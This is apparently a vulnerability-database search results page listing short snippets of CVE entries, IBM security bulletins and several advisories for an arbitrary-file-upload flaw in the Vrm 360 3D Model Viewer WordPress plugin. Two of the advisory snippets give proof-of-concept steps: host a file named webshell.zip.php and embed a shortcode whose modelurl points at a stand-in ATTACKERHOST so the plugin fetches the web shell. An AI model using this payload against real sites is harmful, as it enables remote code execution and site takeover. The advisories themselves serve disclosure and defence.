66 matches found
EUVD-2021-10788
Malware in sbrugna...
EUVD-2021-10785
Malware in sbrugna...
EUVD-2021-10786
Malware in sbrugna...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
Security Bulletin: XSS vulnerability affects IBM Cloud Object Storage System (CVE-2021-39014)
Summary XSS vulnerability affects IBM Cloud Object Storage System CVE-2021-39014. This vulnerability has been addressed in the latest ClevOS releases. Vulnerability Details CVEID:CVE-2021-39014 DESCRIPTION: IBM Cloud Object System is vulnerable to stored cross-site scripting. This vulnerability...
Security Bulletin: IBM Storage Insights is vulnerable to weaknesses related to IBM® SDK, Java™ Technology Edition
Summary Vulnerabilities in IBM® SDK, Java™ Technology Edition may affect IBM Storage Insights which could allow a remote attacker to cause low integrity impact, low availability impact. Vulnerability Details CVEID:CVE-2024-21094 DESCRIPTION: An unspecified vulnerability in Java SE related to the V...
Security Bulletin: pdfmake vulnerability affect IBM Spectrum Control
Summary Vulnerability in pdfmake could allow a remote attacker to execute arbitrary code on the system, which could affect IBM Spectrum Control. CVE-2024-25180. Vulnerability Details CVEID:CVE-2024-25180 DESCRIPTION: pdfmake could allow a remote attacker to execute arbitrary code on the system,...
How to Accelerate Vendor Risk Assessments in the Age of SaaS Sprawl
In today's digital-first business environment dominated by SaaS applications, organizations increasingly depend on third-party vendors for essential cloud services and software solutions. As more vendors and services are added to the mix, the complexity and potential vulnerabilities within the Sa...
CVE-2023-4311 Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311
CVE-2023-4311 affects the Vrm 360 3D Model Viewer WordPress plugin (versions up to 1.2.1). The vulnerability is an arbitrary file upload due to insufficient checks in a plugin shortcode, enabling potential remote code execution. Public sources in the connected records describe PoCs and demonstrat...
PT-2023-28700 · WordPress · Vrm 360 3D Model Viewer
Name of the Vulnerable Software and Affected Versions: Vrm 360 3D Model Viewer WordPress plugin versions 1.2.1 and earlier Description: The issue arises from insufficient checks in a plugin shortcode, allowing for arbitrary file upload. Recommendations: For Vrm 360 3D Model Viewer WordPress plugi...
WordPress Plugin Vrm 360 3D Model Viewer Security Vulnerability
WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers. WordPress plugin is an application plugin. A security vulnerability exists in WordPres...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Path traversal
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...